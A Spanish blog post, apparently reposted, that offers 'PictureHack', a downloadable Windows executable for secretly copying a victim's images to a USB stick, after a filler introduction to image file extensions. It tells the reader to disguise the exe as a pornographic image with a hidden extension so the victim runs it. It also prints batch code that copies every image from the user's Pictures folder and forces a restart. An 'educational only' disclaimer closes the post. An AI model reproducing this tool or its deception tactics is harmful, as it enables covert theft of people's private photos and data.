PictureHack robar Imágenes de una pc hacia la USB



¿Qué es una extensión de archivo de imagen?
Las extensiones de archivo de imagen ayudan a tu equipo a entender el tipo de archivo.
Las imágenes digitales vienen en varios formatos diferentes, y cada uno tiene su propia extensión de archivo. Esto puede parecer confuso al principio, pero tiene sentido una vez que entiendes lo que son las extensiones de archivos.
Identificación.

Una extensión de archivo es el sufijo del nombre de archivo que viene después del "punto". Por ejemplo, un archivo llamado "Picture.jpg" tiene la extensión de archivo ".jpg".

Tipos
Hay muchas extensiones de archivo para los archivos de imagen, pero los más populares son .JPG (o.JPEG), .GIF, .PNG y .TIF. Además de estos tipos muchas cámaras digitales guardan en un formato conocido como .RAW o un formato específico de la marca. Puede que tengas que instalar un controlador especial para abrir o ver estos archivos.

Función
Cada extensión de archivo de imagen designa un tipo diferente de compresión de imagen, dejando que tu visor de imágenes o navegador de Internet sepa con qué formato está comprimida la imagen que puede mostrar. Por ejemplo, los archivos .JPG se comprimen en el formato de un grupo de expertos de foto conjunta, mientras que los archivos .GIF están en el formato de intercambio gráfico.
PictureHack
Es una aplicación ejecutable para windows con extensión exe , se encarga de robar o extraer las Imágenes de una pc hacia la USB. todo tipo de formato de imágenes.

Requisitos

Sistema operativo Windows 7/10

Usb o pendrive

Descargar PictureHack


Una vez descargado , lo guardamos en nuestra memoria usb , para luego ser ejecutada y obtener las fotos, imágenes etc, de nuestra victima.
Notaremos que podemos hacer que la victima ejecute el programa al ver que es una imagen de xxx de pornografía y este sin querer no se dará cuenta por la curiosidad también podemos hacerlo con nuestras fotos .Ha esto se puede llamar ingeniería social



Podemos ver que tiene la extencion exe que podemos hacerlo con solo ocultar el tipo de extensión

Primero creara una carpeta donde se almacenara todas las imágenes , luego creara un archivo de todo las información de la pc y para finalizar se apagara la pc de nuestra victima.

Código bat

shutdown -r -t 3600 -c "Hola %USERNAME% "

for /R %USERPROFILE%\Pictures\ %%x in (*.jpg,*.jpeg,*.png , *.gif , *.bmp ,*.psd) do copy "%%x" ".\"



Comunidad Cyber Hacking

Referencias

OfficeHack extraer documentos de microsoft Office de la pc a una usb

DetectViruS seguridad en internet los puertos y comunicaciones

Eliminar los virus de una usb con el Antivirus Stain

Extraer las claves de wifi de windows

Error Script Host

Cómo eliminar virus usb que oculta todos los archivos y crea un enlace

Gamer Over vurus

Cambiando el fondo de pantalla con Avast Security

Activar / Desactivar firewall de Windows y remotamente

Importar perfiles de wifi con Powershell Wlan-Profiles

Obtener información del sistema de un equipo Windows

Importando las claves de wifi en un archivo xml

¿Qué es y cómo funciona un ataque DDoS? con Attack2D



Descargar

Github





ADVERTENCIA: NO INTENTE HACER UN ATAQUE SIN EL PERMISO DE PROPIETARIO DEL SITIO WEB. ES UN PROPÓSITO EDUCATIVO SOLAMENTE. NO ES RESPONSABLE DE NINGUN TIPO DE PROBLEMA ILEGAL.

PERMANECE LEGAL. GRACIAS!

Si tienes algún problema, deja un comentario.



Follow @LPericena



Luishiño

Hola soy Luishiño estudio la carrera de ing. sistemas y este es mi Blog personal aquí es donde me gusta escribir sobre temas que en su momento me interesan. Aveces sobre mi vida personal y principalmente cosas de programación ,desarrollo web.Aplicaciones,Software, programas que yo mismo las desarrollo y cosas básicas de informática. Nadie es como tú y ese es tú súper poder ¯\(°_o)/¯ Sigue mi blog

Mi nombre es Luishiño aquí es donde me gusta escribir sobre temas que en su momento me interesan. Aveces sobre mi vida personal y principalmente cosas de programación ,desarrollo web.Aplicaciones,Software, programas que yo mismo las desarrollo y cosas básicas de informática.

Fuente: este post proviene de The Seven Codes, donde puedes consultar el contenido original.
¿Vulnera este post tus derechos? Pincha aquí.
Creado:
¿Qué te ha parecido esta idea?

Esta idea proviene de:

Y estas son sus últimas ideas publicadas:

SISTEMA DE DIAGNOSTICO Se desea diseñar un diagrama de clases para administrar el trabajo del médico que mediante una cuenta de usuario deberá: • Un administrador se encargará de administrar el sistem ...

¿Qué es el SQL injection? Una inyección de SQL, a veces abreviada como SQLi, es un tipo de vulnerabilidad en la que un atacante usa un trozo de código SQL (lenguaje de consulta estructurado) para mani ...

Recomendamos